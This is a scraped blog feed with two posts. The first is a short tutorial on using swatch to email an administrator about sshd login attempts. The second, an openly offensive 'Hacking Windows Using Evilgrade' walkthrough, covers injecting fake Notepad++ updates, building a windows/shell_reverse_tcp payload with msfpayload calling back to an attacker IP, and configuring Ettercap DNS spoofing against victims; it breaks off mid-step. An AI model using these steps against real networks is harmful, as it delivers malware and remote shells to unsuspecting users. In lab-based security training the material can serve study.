<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
A simple example of swatch in action. If you are the sole sysadmin of a webserver, you would probly want to be notified if someone attempts to try to log into your server (could be over ssh or other authentication services). Being the sole admin of the webserver, no one else should have any business being on the system. Anyone but the admin attempting to login to the system obviously doesn’t belong there and may have bad intentions. In this case, you can set up swatch to monitor the auth.log file for failed logon attempts and succesful logon attempts and then send you an email whenever their is attempts from anyone to log in. Of course this will notify you even when you log on to the machine, therefore this might be more practical if you have an unattended system (maybe you are on vacation or away on business).</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<span id="more-1690" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"></span>I use an email program which is actually a perl script, called sendemail. On a debian based system, you can install it via apt-get install sendemail. Likewise, to install swatch, apt-get install swatch. Once both are installed, a simple configuration for swatch is as follows</div>
<blockquote style="background-color: #181818; background-image: url(http://www.coresec.org/wp-content/themes/pyrmont-v2/images/blockquote.gif); background-repeat: no-repeat no-repeat; border-bottom-color: rgb(42, 46, 47); border-bottom-style: solid; border-top-color: rgb(42, 46, 47); border-top-style: solid; border-width: 1px 0px; color: #999999; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px 15px 24px; outline: 0px; padding: 35px 20px 10px 50px; quotes: none; text-align: -webkit-auto; vertical-align: baseline;">
<div style="background-color: transparent; border: 0px; margin-bottom: 8px; outline: 0px; padding: 0px; vertical-align: baseline;">
watchfor /sshd/<br style="margin: 0px; padding: 0px;" />echo bold<br style="margin: 0px; padding: 0px;" />bell 3<br style="margin: 0px; padding: 0px;" />exec “/usr/bin/sendemail -f youremail@hotmail.com -xu youremail@hotmail.com -xp your_hotmail_pass -u “Log alert” -m “Possible SSHD login attemp” -t youremail@hotmail.com -s smtp.live.com”</div>
</blockquote>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Save the above to a text file with an appropriate name such as swatch.conf</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Then we can execute swatch like this:</div>
<blockquote style="background-color: #181818; background-image: url(http://www.coresec.org/wp-content/themes/pyrmont-v2/images/blockquote.gif); background-repeat: no-repeat no-repeat; border-bottom-color: rgb(42, 46, 47); border-bottom-style: solid; border-top-color: rgb(42, 46, 47); border-top-style: solid; border-width: 1px 0px; color: #999999; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px 15px 24px; outline: 0px; padding: 35px 20px 10px 50px; quotes: none; text-align: -webkit-auto; vertical-align: baseline;">
<div style="background-color: transparent; border: 0px; margin-bottom: 8px; outline: 0px; padding: 0px; vertical-align: baseline;">
# swatch –config-file=/path/to/swatch.conf –script-dir=/path/to/your_config_dir –examine=/var/log/auth.log</div>
</blockquote>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Whenever someone attempts to login to your sshd server, the sshd daemon will log the login attemp in /var/log/auth.log. The swatch program will monitor the auth.log file for the string sshd and whenever it gets a match, it will leave a notification on the console and then send an email to youremail@hotmail.com. The swatch program understands regex expressions so you can perform more advanced matches instead of a simple string like sshd.</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Download <a href="http://sourceforge.net/projects/swatch/" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">Swatch</a></div>
<br />
<i>©2012, copyright BLACK BURN </i></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3436039399135336524.post-25132674312753568482012-07-16T14:27:00.002+06:002012-07-16T14:27:59.686+06:00Hacking Windows Using Evilgrade<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<em style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. It comes with pre-made binaries (agents), a working default configuration for fast pentests, and has it’s own WebServer and DNSServer modules. Easy to set up new settings, and has an autoconfiguration when new binary agents are set.</em></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
From : <a href="http://www.infobytesec.com/" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">http://www.infobytesec.com</a></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Requirement :</strong></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
1. <a href="http://www.infobytesec.com/" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">Evilgrade</a><br style="margin: 0px; padding: 0px;" />2. <a href="http://www.backtrack-linux.org/" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">Backtrack 5</a></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Step By Step :</strong></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">1. Extract Evilgrade then run it using the command below</strong></div>
<pre style="background-color: #131313; border: 0px; color: #cccccc; font-size: 13px; line-height: 22px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">tar xvfz isr-evilgrade-2.0.0.tar.gz
cd isr-evilgrade-2.0.0.tar.gz/
./evilgrade</pre>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<span id="more-1750" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"></span></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
If there’s an error when you run the application, you can refer to my post about <a href="http://vishnuvalentino.com/tips-and-trick/evilgrade-2-0-error-on-backtrack-5-solved/" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">how to solve evilgrade error on Backtrack 5</a>. below is the picture if you success run the application :</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<img alt="Hacking using Evilgrade on Backtrack 5" height="273" src="http://www.fileden.com/files/2007/1/30/711400/evilgrade/evilgrade1.jpg" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;" width="385" /></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">2. The next step is you need to determine the target of the application, because Evilgrade will create a fake update to inject the victim computer. To list all the supported application use</strong></div>
<pre style="background-color: #131313; border: 0px; color: #cccccc; font-size: 13px; line-height: 22px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">evilgrade>show modules</pre>
<pre style="background-color: #131313; border: 0px; color: #cccccc; font-size: 13px; line-height: 22px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">List of modules:
===============</pre>
<table border="0" cellpadding="0" cellspacing="0" style="background-color: #181818; border-collapse: collapse; border-spacing: 0px; border: 1px solid rgb(42, 46, 47); color: #999999; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px 0px 20px; outline: 0px; padding: 0px; vertical-align: baseline; width: 319px;"><tbody style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
<tr style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><td style="background-color: transparent; border: 1px solid rgb(42, 46, 47); margin: 0px; outline: 0px; padding: 2px 5px; vertical-align: baseline;" valign="top" width="284">allmynotes<br style="margin: 0px; padding: 0px;" />amsn<br style="margin: 0px; padding: 0px;" />appleupdate<br style="margin: 0px; padding: 0px;" />apptapp<br style="margin: 0px; padding: 0px;" />apt<br style="margin: 0px; padding: 0px;" />atube<br style="margin: 0px; padding: 0px;" />autoit3<br style="margin: 0px; padding: 0px;" />bbappworld<br style="margin: 0px; padding: 0px;" />blackberry<br style="margin: 0px; padding: 0px;" />bsplayer<br style="margin: 0px; padding: 0px;" />ccleaner<br style="margin: 0px; padding: 0px;" />clamwin<br style="margin: 0px; padding: 0px;" />cpan<br style="margin: 0px; padding: 0px;" />cygwin<br style="margin: 0px; padding: 0px;" />dap<br style="margin: 0px; padding: 0px;" />divxsuite<br style="margin: 0px; padding: 0px;" />express_talk<br style="margin: 0px; padding: 0px;" />fcleaner<br style="margin: 0px; padding: 0px;" />filezilla<br style="margin: 0px; padding: 0px;" />flashget<br style="margin: 0px; padding: 0px;" />flip4mac<br style="margin: 0px; padding: 0px;" />freerip<br style="margin: 0px; padding: 0px;" />getjar<br style="margin: 0px; padding: 0px;" />gom<br style="margin: 0px; padding: 0px;" />googleanalytics<br style="margin: 0px; padding: 0px;" />growl<br style="margin: 0px; padding: 0px;" />isopen<br style="margin: 0px; padding: 0px;" />istat<br style="margin: 0px; padding: 0px;" />itunes<br style="margin: 0px; padding: 0px;" />jet<br style="margin: 0px; padding: 0px;" />jetphoto<br style="margin: 0px; padding: 0px;" />linkedin</td><td style="background-color: transparent; border: 1px solid rgb(42, 46, 47); margin: 0px; outline: 0px; padding: 2px 5px; vertical-align: baseline;" valign="top" width="284">miranda<br style="margin: 0px; padding: 0px;" />mirc<br style="margin: 0px; padding: 0px;" />nokia<br style="margin: 0px; padding: 0px;" />nokiasoftware<br style="margin: 0px; padding: 0px;" />notepadplus<br style="margin: 0px; padding: 0px;" />openoffice<br style="margin: 0px; padding: 0px;" />opera<br style="margin: 0px; padding: 0px;" />orbit<br style="margin: 0px; padding: 0px;" />osx<br style="margin: 0px; padding: 0px;" />paintnet<br style="margin: 0px; padding: 0px;" />panda_antirootkit<br style="margin: 0px; padding: 0px;" />photoscape<br style="margin: 0px; padding: 0px;" />quicktime<br style="margin: 0px; padding: 0px;" />skype<br style="margin: 0px; padding: 0px;" />sparkle<br style="margin: 0px; padding: 0px;" />speedbit<br style="margin: 0px; padding: 0px;" />sunbelt<br style="margin: 0px; padding: 0px;" />sunjava<br style="margin: 0px; padding: 0px;" />superantispyware<br style="margin: 0px; padding: 0px;" />teamviewer<br style="margin: 0px; padding: 0px;" />techtracker<br style="margin: 0px; padding: 0px;" />trillian<br style="margin: 0px; padding: 0px;" />ubertwitter<br style="margin: 0px; padding: 0px;" />vidbox<br style="margin: 0px; padding: 0px;" />virtualbox<br style="margin: 0px; padding: 0px;" />vmware<br style="margin: 0px; padding: 0px;" />winamp<br style="margin: 0px; padding: 0px;" />winscp<br style="margin: 0px; padding: 0px;" />winupdate<br style="margin: 0px; padding: 0px;" />winzip<br style="margin: 0px; padding: 0px;" />yahoomsn</td></tr>
</tbody></table>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
In this tutorial we will targeting user who use Notepad Plus, so when they’re updating their application automatically it will caught in my trap. To use modules, simply run</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
evilgrade> configure notepadplus</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">3. To view the options that you can set up use command show options.</strong></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<img alt="Hacking using evilgrade 2.0 on backtrack 5" class="alignnone" height="267" src="http://www.fileden.com/files/2007/1/30/711400/evilgrade/evilgrade2.jpg" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;" width="601" /></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
in the image above there’s VirtualHost that means when the victim update their notepad plus it will opening URL notepad-plus.sourceforge.net. later we will use this address.</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">4. The next step is setting an agent. I’m configuring this agent to create shell_reverse_tcp using msfpayload.</strong></div>
<div class="my_syntax_box" style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><a href="http://www.coresec.org/2011/07/08/hacking-windows-using-evilgrade/" style="background-color: transparent; background-image: url(http://www.coresec.org/wp-content/plugins/my-syntax/css/images/clipboard.png) !important; background-position: 100% 50%; background-repeat: no-repeat no-repeat !important; border: none; color: #ff5a00; float: right !important; font-family: arial !important; font-size: 12px !important; font-weight: bold !important; line-height: 20px !important; margin: 3px 5px 0px 10px !important; outline: invert none 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 20px !important; padding-top: 0px; text-decoration: none; vertical-align: baseline;">Select All</a></span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">evilgrade(notepadplus)>set agent '["/pentest/exploits/framework3/msfpayload windows/shell_reverse_tcp LHOST=192.168.8.91 LPORT=1234 X > <%OUT%>/tmp/notepadplus.exe<%OUT%>"]'</pre>
</div>
</div>
</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Explanation:</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
/pentest/exploits/framework3/msfpayload –> We will load the msfpayload.</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
windows/shell_reverse_tcp –> We will use windows shell reverse tcp payload to open shell on target when operation succeeded.</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
LHOST –> localhost you backtrack 5 ip address / attacker ip address.</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
LPORT –> in which port you will interract with the victim when operation succedded. for further information about this you can refer to the <a href="http://www.infobytesec.com/down/isr-evilgrade-Readme.txt" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">readme file</a>.</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">5. The next step is we need to start the evilgrade server. Make sure your port 80 is empty.</strong></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<img alt="Hacking using Evilgrade 2.0 on backtrack 5" height="158" src="http://www.fileden.com/files/2007/1/30/711400/evilgrade/evilgrade3.jpg" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;" width="595" /></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">6. After finish setting up Evilgrade, we also need to configure the Man in the Middle attack using Ettercap, then redirect the connection to Evilgrade server when someone updating their notepad plus application. First step is you need to configure etter.dns .</strong></div>
<div class="my_syntax_box" style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><a href="http://www.coresec.org/2011/07/08/hacking-windows-using-evilgrade/" style="background-color: transparent; background-image: url(http://www.coresec.org/wp-content/plugins/my-syntax/css/images/clipboard.png) !important; background-position: 100% 50%; background-repeat: no-repeat no-repeat !important; border: none; color: #ff5a00; float: right !important; font-family: arial !important; font-size: 12px !important; font-weight: bold !important; line-height: 20px !important; margin: 3px 5px 0px 10px !important; outline: invert none 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 20px !important; padding-top: 0px; text-decoration: none; vertical-align: baseline;">Select All</a></span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">pico /usr/share/ettercap/etter.dns</pre>
</div>
</div>
</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<img alt="Hacking using evilgrade 2.0 on backtrack 5" height="174" src="http://www.fileden.com/files/2007/1/30/711400/evilgrade/evilgrade4.jpg" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;" width="590" /><strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"></strong></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
notepad-plus.sourceforge.net –> this address we get from no.3.</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">7. For the next step we will use Ettercap</strong></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<em style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">“Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks.<br style="margin: 0px; padding: 0px;" />It supports active and passive dissection of many protocols (even ciphered ones) and includes many feature for network and host analysis.”</em>From : <a href="http://ettercap.sourceforge.net/" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">http://ettercap.sourceforge.net/</a></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
To run Ettercap, open new terminal(Ctrl+Alt+T) run this command</div>
<div class="my_syntax_box" style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><a href="http://www.coresec.org/2011/07/08/hacking-windows-using-evilgrade/" style="background-color: transparent; background-image: url(http://www.coresec.org/wp-content/plugins/my-syntax/css/images/clipboard.png) !important; background-position: 100% 50%; background-repeat: no-repeat no-repeat !important; border: none; color: #ff5a00; float: right !important; font-family: arial !important; font-size: 12px !important; font-weight: bold !important; line-height: 20px !important; margin: 3px 5px 0px 10px !important; outline: invert none 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 20px !important; padding-top: 0px; text-decoration: none; vertical-align: baseline;">Select All</a></span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">ettercap -G</pre>
</div>
</div>
</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Click Sniff –> Unified sniffing –> choose your network interface card, in this case I’m using eth0.</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<img alt="Hacking using evilgrade 2.0 on Backtrack 5" height="362" src="http://www.fileden.com/files/2007/1/30/711400/evilgrade/evilgrade5.jpg" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;" width="446" /></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">8. The next step we need to enable dns_spoof plugin this plugin used to redirect the request from victim to Evilgrade server. Click Plugins –> Manage the plugins –> Double click dns_spoof</strong></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
